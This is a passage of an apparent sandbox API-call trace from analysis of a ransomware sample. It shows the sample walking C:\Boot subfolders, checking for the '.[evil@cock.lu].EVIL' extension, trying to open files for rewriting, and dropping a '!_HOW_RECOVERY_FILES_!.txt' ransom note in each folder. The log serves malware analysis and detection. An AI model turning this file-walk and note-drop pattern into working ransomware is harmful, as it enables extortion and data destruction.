hTemplateFile=0x0) returned 0xffffffffffffffff [0077.462] GetLastError () returned 0x5 [0077.462] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0077.462] wcsstr (_Str="memtest.exe.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.462] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\de-DE\\memtest.exe.mui") returned 30 [0077.462] wcscmp (_String1="memtest.exe.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0077.462] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="memtest.exe.mui") returned 0x0 [0077.462] wcslen (_String="C:\\\\Boot\\de-DE\\memtest.exe.mui") returned 0x1e [0077.462] CreateFileW (lpFileName="C:\\\\Boot\\de-DE\\memtest.exe.mui" (normalized: "c:\\boot\\de-de\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0077.467] GetLastError () returned 0x5 [0077.467] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0 [0077.467] FindClose (in: hFindFile=0x84b11cd150 | out: hFindFile=0x84b11cd150) returned 1 [0077.467] wcslen (_String="C:\\\\Boot\\de-DE") returned 0xe [0077.467] strlen (_Str="${KEY}") returned 0x6 [0077.467] memchr (_Buf=0x84b116bf00, _Val=36, _MaxCount=0x391) returned 0x84b116c0e0 [0077.467] memchr (_Buf=0x84b116c0e1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0077.467] strlen (_Str="${CODE}") returned 0x7 [0077.467] memchr (_Buf=0x84b116bf00, _Val=36, _MaxCount=0x390) returned 0x84b116c0e0 [0077.467] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0077.467] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0077.467] _wfsopen (_FileName="C:\\\\Boot\\de-DE\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0077.515] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0077.515] __uncaught_exception () returned 0x84b1160800 [0077.515] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0077.516] FindNextFileW (in: hFindFile=0x84b11cd0f0, lpFindFileData=0x84b0fdee80 | out: lpFindFileData=0x84b0fdee80) returned 1 [0077.516] wcsstr (_Str="el-GR", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.516] _snwprintf (in: _Dest=0x84b0fdf0d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\el-GR") returned 14 [0077.516] wcscmp (_String1=".", _String2="el-GR") returned -1 [0077.516] wcscmp (_String1="..", _String2="el-GR") returned -1 [0077.516] wcslen (_String="C:\\\\Boot\\el-GR") returned 0xe [0077.516] wcscpy_s (in: _Destination=0x84b0fdebb0, _SizeInWords=0x104, _Source="C:\\\\Boot\\el-GR" | out: _Destination="C:\\\\Boot\\el-GR") returned 0x0 [0077.516] wcscat (in: _Dest=0x84b0fdebb0, _Source="\\*" | out: _Dest="C:\\\\Boot\\el-GR\\*") returned="C:\\\\Boot\\el-GR\\*" [0077.516] FindFirstFileW (in: lpFileName="C:\\\\Boot\\el-GR\\*", lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0x84b11cd150 [0077.516] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.516] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\el-GR\\.") returned 16 [0077.517] wcscmp (_String1=".", _String2=".") returned 0 [0077.517] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0077.517] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.517] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\el-GR\\..") returned 17 [0077.517] wcscmp (_String1=".", _String2="..") returned -1 [0077.517] wcscmp (_String1="..", _String2="..") returned 0 [0077.517] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0077.517] wcsstr (_Str="bootmgr.exe.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.517] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\el-GR\\bootmgr.exe.mui") returned 30 [0077.517] wcscmp (_String1="bootmgr.exe.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0077.517] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="bootmgr.exe.mui") returned 0x0 [0077.517] wcslen (_String="C:\\\\Boot\\el-GR\\bootmgr.exe.mui") returned 0x1e [0077.517] CreateFileW (lpFileName="C:\\\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0077.517] GetLastError () returned 0x5 [0077.517] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0077.517] wcsstr (_Str="memtest.exe.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.517] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\el-GR\\memtest.exe.mui") returned 30 [0077.517] wcscmp (_String1="memtest.exe.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0077.517] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="memtest.exe.mui") returned 0x0 [0077.517] wcslen (_String="C:\\\\Boot\\el-GR\\memtest.exe.mui") returned 0x1e [0077.517] CreateFileW (lpFileName="C:\\\\Boot\\el-GR\\memtest.exe.mui" (normalized: "c:\\boot\\el-gr\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0077.518] GetLastError () returned 0x5 [0077.518] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0 [0077.518] FindClose (in: hFindFile=0x84b11cd150 | out: hFindFile=0x84b11cd150) returned 1 [0077.518] wcslen (_String="C:\\\\Boot\\el-GR") returned 0xe [0077.518] strlen (_Str="${KEY}") returned 0x6 [0077.518] memchr (_Buf=0x84b116bf00, _Val=36, _MaxCount=0x391) returned 0x84b116c0e0 [0077.518] memchr (_Buf=0x84b116c0e1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0077.518] strlen (_Str="${CODE}") returned 0x7 [0077.518] memchr (_Buf=0x84b116bf00, _Val=36, _MaxCount=0x390) returned 0x84b116c0e0 [0077.518] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0077.518] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0077.518] _wfsopen (_FileName="C:\\\\Boot\\el-GR\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0077.532] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0077.532] __uncaught_exception () returned 0x84b1160800 [0077.532] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0077.533] FindNextFileW (in: hFindFile=0x84b11cd0f0, lpFindFileData=0x84b0fdee80 | out: lpFindFileData=0x84b0fdee80) returned 1 [0077.533] wcsstr (_Str="en-GB", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.533] _snwprintf (in: _Dest=0x84b0fdf0d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\en-GB") returned 14 [0077.533] wcscmp (_String1=".", _String2="en-GB") returned -1 [0077.533] wcscmp (_String1="..", _String2="en-GB") returned -1 [0077.533] wcslen (_String="C:\\\\Boot\\en-GB") returned 0xe [0077.533] wcscpy_s (in: _Destination=0x84b0fdebb0, _SizeInWords=0x104, _Source="C:\\\\Boot\\en-GB" | out: _Destination="C:\\\\Boot\\en-GB") returned 0x0 [0077.533] wcscat (in: _Dest=0x84b0fdebb0, _Source="\\*" | out: _Dest="C:\\\\Boot\\en-GB\\*") returned="C:\\\\Boot\\en-GB\\*" [0077.533] FindFirstFileW (in: lpFileName="C:\\\\Boot\\en-GB\\*", lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0x84b11cd150 [0077.549] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.549] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\en-GB\\.") returned 16 [0077.549] wcscmp (_String1=".", _String2=".") returned 0 [0077.549] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0077.549] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.549] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\en-GB\\..") returned 17 [0077.549] wcscmp (_String1=".", _String2="..") returned -1 [0077.549] wcscmp (_String1="..", _String2="..") returned 0 [0077.549] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0077.549] wcsstr (_Str="bootmgr.exe.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.549] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\en-GB\\bootmgr.exe.mui") returned 30 [0077.549] wcscmp (_String1="bootmgr.exe.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0077.549] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="bootmgr.exe.mui") returned 0x0 [0077.549] wcslen (_String="C:\\\\Boot\\en-GB\\bootmgr.exe.mui") returned 0x1e [0077.549] CreateFileW (lpFileName="C:\\\\Boot\\en-GB\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-gb\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0077.550] GetLastError () returned 0x5 [0077.550] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0 [0077.550] FindClose (in: hFindFile=0x84b11cd150 | out: hFindFile=0x84b11cd150) returned 1 [0077.550] wcslen (_String="C:\\\\Boot\\en-GB") returned 0xe [0077.550] strlen (_Str="${KEY}") returned 0x6 [0077.550] memchr (_Buf=0x84b116bf00, _Val=36, _MaxCount=0x391) returned 0x84b116c0e0 [0077.550] memchr (_Buf=0x84b116c0e1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0077.550] strlen (_Str="${CODE}") returned 0x7 [0077.550] memchr (_Buf=0x84b116bf00, _Val=36, _MaxCount=0x390) returned 0x84b116c0e0 [0077.550] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0077.550] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0077.550] _wfsopen (_FileName="C:\\\\Boot\\en-GB\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0077.550] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0077.550] __uncaught_exception () returned 0x84b1160800 [0077.551] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0077.551] FindNextFileW (in: hFindFile=0x84b11cd0f0, lpFindFileData=0x84b0fdee80 | out: lpFindFileData=0x84b0fdee80) returned 1 [0077.551] wcsstr (_Str="en-US", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.551] _snwprintf (in: _Dest=0x84b0fdf0d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\en-US") returned 14 [0077.551] wcscmp (_String1=".", _String2="en-US") returned -1 [0077.551] wcscmp (_String1="..", _String2="en-US") returned -1 [0077.551] wcslen (_String="C:\\\\Boot\\en-US") returned 0xe [0077.551] wcscpy_s (in: _Destination=0x84b0fdebb0, _SizeInWords=0x104, _Source="C:\\\\Boot\\en-US" | out: _Destination="C:\\\\Boot\\en-US") returned 0x0 [0077.551] wcscat (in: _Dest=0x84b0fdebb0, _Source="\\*" | out: _Dest="C:\\\\Boot\\en-US\\*") returned="C:\\\\Boot\\en-US\\*" [0077.552] FindFirstFileW (in: lpFileName="C:\\\\Boot\\en-US\\*", lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0x84b11cd150 [0077.552] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.552] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\en-US\\.") returned 16 [0077.552] wcscmp (_String1=".", _String2=".") returned 0 [0077.552] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0077.552] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.552] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\en-US\\..") returned 17 [0077.552] wcscmp (_String1=".", _String2="..") returned -1 [0077.552] wcscmp (_String1="..", _String2="..") returned 0 [0077.552] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0077.552] wcsstr (_Str="bootmgr.exe.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.552] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\en-US\\bootmgr.exe.mui") returned 30 [0077.552] wcscmp (_String1="bootmgr.exe.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0077.552] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="bootmgr.exe.mui") returned 0x0 [0077.552] wcslen (_String="C:\\\\Boot\\en-US\\bootmgr.exe.mui") returned 0x1e [0077.552] CreateFileW (lpFileName="C:\\\\Boot\\en-US\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0077.552] GetLastError () returned 0x5 [0077.552] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0077.552] wcsstr (_Str="memtest.exe.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.552] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\en-US\\memtest.exe.mui") returned 30 [0077.552] wcscmp (_String1="memtest.exe.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0077.552] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="memtest.exe.mui") returned 0x0 [0077.552] wcslen (_String="C:\\\\Boot\\en-US\\memtest.exe.mui") returned 0x1e [0077.552] CreateFileW (lpFileName="C:\\\\Boot\\en-US\\memtest.exe.mui" (normalized: "c:\\boot\\en-us\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0077.554] GetLastError () returned 0x5 [0077.554] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0 [0077.554] FindClose (in: hFindFile=0x84b11cd150 | out: hFindFile=0x84b11cd150) returned 1 [0077.554] wcslen (_String="C:\\\\Boot\\en-US") returned 0xe [0077.554] strlen (_Str="${KEY}") returned 0x6 [0077.554] memchr (_Buf=0x84b116bf00, _Val=36, _MaxCount=0x391) returned 0x84b116c0e0 [0077.554] memchr (_Buf=0x84b116c0e1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0077.554] strlen (_Str="${CODE}") returned 0x7 [0077.554] memchr (_Buf=0x84b116bf00, _Val=36, _MaxCount=0x390) returned 0x84b116c0e0 [0077.554] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0077.554] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0077.554] _wfsopen (_FileName="C:\\\\Boot\\en-US\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0077.599] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0077.600] __uncaught_exception () returned 0x84b1160800 [0077.600] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0077.601] FindNextFileW (in: hFindFile=0x84b11cd0f0, lpFindFileData=0x84b0fdee80 | out: lpFindFileData=0x84b0fdee80) returned 1 [0077.601] wcsstr (_Str="es-ES", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.601] _snwprintf (in: _Dest=0x84b0fdf0d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\es-ES") returned 14 [0077.601] wcscmp (_String1=".", _String2="es-ES") returned -1 [0077.601] wcscmp (_String1="..", _String2="es-ES") returned -1 [0077.601] wcslen (_String="C:\\\\Boot\\es-ES") returned 0xe [0077.601] wcscpy_s (in: _Destination=0x84b0fdebb0, _SizeInWords=0x104, _Source="C:\\\\Boot\\es-ES" | out: _Destination="C:\\\\Boot\\es-ES") returned 0x0 [0077.601] wcscat (in: _Dest=0x84b0fdebb0, _Source="\\*" | out: _Dest="C:\\\\Boot\\es-ES\\*") returned="C:\\\\Boot\\es-ES\\*" [0077.601] FindFirstFileW (in: lpFileName="C:\\\\Boot\\es-ES\\*", lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0x84b11cd150 [0077.601] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.601] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\es-ES\\.") returned 16 [0077.601] wcscmp (_String1=".", _String2=".") returned 0 [0077.601] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0077.601] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.601] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\es-ES\\..") returned 17 [0077.601] wcscmp (_String1=".", _String2="..") returned -1 [0077.601] wcscmp (_String1="..", _String2="..") returned 0 [0077.601] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0077.601] wcsstr (_Str="bootmgr.exe.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.601] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\es-ES\\bootmgr.exe.mui") returned 30 [0077.601] wcscmp (_String1="bootmgr.exe.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0077.601] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="bootmgr.exe.mui") returned 0x0 [0077.601] wcslen (_String="C:\\\\Boot\\es-ES\\bootmgr.exe.mui") returned 0x1e [0077.601] CreateFileW (lpFileName="C:\\\\Boot\\es-ES\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0077.601] GetLastError () returned 0x5 [0077.601] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0077.602] wcsstr (_Str="memtest.exe.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.602] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\es-ES\\memtest.exe.mui") returned 30 [0077.602] wcscmp (_String1="memtest.exe.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0077.602] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="memtest.exe.mui") returned 0x0 [0077.602] wcslen (_String="C:\\\\Boot\\es-ES\\memtest.exe.mui") returned 0x1e [0077.602] CreateFileW (lpFileName="C:\\\\Boot\\es-ES\\memtest.exe.mui" (normalized: "c:\\boot\\es-es\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0077.602] GetLastError () returned 0x5 [0077.602] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0 [0077.602] FindClose (in: hFindFile=0x84b11cd150 | out: hFindFile=0x84b11cd150) returned 1 [0077.602] wcslen (_String="C:\\\\Boot\\es-ES") returned 0xe [0077.602] strlen (_Str="${KEY}") returned 0x6 [0077.602] memchr (_Buf=0x84b116bf00, _Val=36, _MaxCount=0x391) returned 0x84b116c0e0 [0077.602] memchr (_Buf=0x84b116c0e1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0077.602] strlen (_Str="${CODE}") returned 0x7 [0077.602] memchr (_Buf=0x84b116bf00, _Val=36, _MaxCount=0x390) returned 0x84b116c0e0 [0077.602] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0077.602] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0077.602] _wfsopen (_FileName="C:\\\\Boot\\es-ES\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0077.616] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0077.616] __uncaught_exception () returned 0x84b1160800 [0077.616] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0077.616] FindNextFileW (in: hFindFile=0x84b11cd0f0, lpFindFileData=0x84b0fdee80 | out: lpFindFileData=0x84b0fdee80) returned 1 [0077.616] wcsstr (_Str="es-MX", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.616] _snwprintf (in: _Dest=0x84b0fdf0d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\es-MX") returned 14 [0077.616] wcscmp (_String1=".", _String2="es-MX") returned -1 [0077.616] wcscmp (_String1="..", _String2="es-MX") returned -1 [0077.617] wcslen (_String="C:\\\\Boot\\es-MX") returned 0xe [0077.617] wcscpy_s (in: _Destination=0x84b0fdebb0, _SizeInWords=0x104, _Source="C:\\\\Boot\\es-MX" | out: _Destination="C:\\\\Boot\\es-MX") returned 0x0 [0077.617] wcscat (in: _Dest=0x84b0fdebb0, _Source="\\*" | out: _Dest="C:\\\\Boot\\es-MX\\*") returned="C:\\\\Boot\\es-MX\\*" [0077.617] FindFirstFileW (in: lpFileName="C:\\\\Boot\\es-MX\\*", lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0x84b11cd150 [0077.674] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.674] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\es-MX\\.") returned 16 [0077.674] wcscmp (_String1=".", _String2=".") returned 0 [0077.674] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0077.674] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.675] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\es-MX\\..") returned 17 [0077.675] wcscmp (_String1=".", _String2="..") returned -1 [0077.675] wcscmp (_String1="..", _String2="..") returned 0 [0077.675] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0077.675] wcsstr (_Str="bootmgr.exe.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.675] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Boot\\es-MX\\bootmgr.exe.mui") returned 30 [0077.675] wcscmp (_String1="bootmgr.exe.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0077.675] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="bootmgr.exe.mui") returned 0x0 [0077.675] wcslen (_String="C:\\\\Boot\\es-MX\\bootmgr.exe.mui") returned 0x1e [0077.675] CreateFileW (lpFileName="C:\\\\Boot\\es-MX\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-mx\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0077.675] GetLastError () returned 0x5 [0077.675] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0 [0077.675] FindClose (in: hFindFile=0x84b11cd150 | out: hFindFile=0x84b11cd150) returned 1 [0077.675] wcslen (_String="C:\\\\Boot\\es-MX") returned 0xe [0077.675] strlen (_Str="${KEY}") returned 0x6 [0077.675] memchr (_Buf=0x84b116bf00, _Val=36, _MaxCount=0x391) returned 0x84b116c0e0 [0077.675] memchr (_Buf=0x84b116c0e1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0077.675] strlen (_Str="${CODE}") returned 0x7 [0077.675] memchr (_Buf=0x84b116bf00, _Val=36, _MaxCount=0x390) returned 0x84b116c0e0 [0077.675] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0077.675] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0077.675] _wfsopen (_FileName="C:\\\\Boot\\es-MX\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0077.676] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0077.676] __uncaught_exception () returned 0x84b1160800 [0077.676] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0077.676] FindNextFileW (in: hFindFile=0x84b11cd0f0, lpFindFileData=0x84b0fdee80 | out: lpFindFileData=0x84b0fdee80) returned 1 [0077.677] wcsstr (_Str="et-EE", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0077.677] _snwprintf (in: 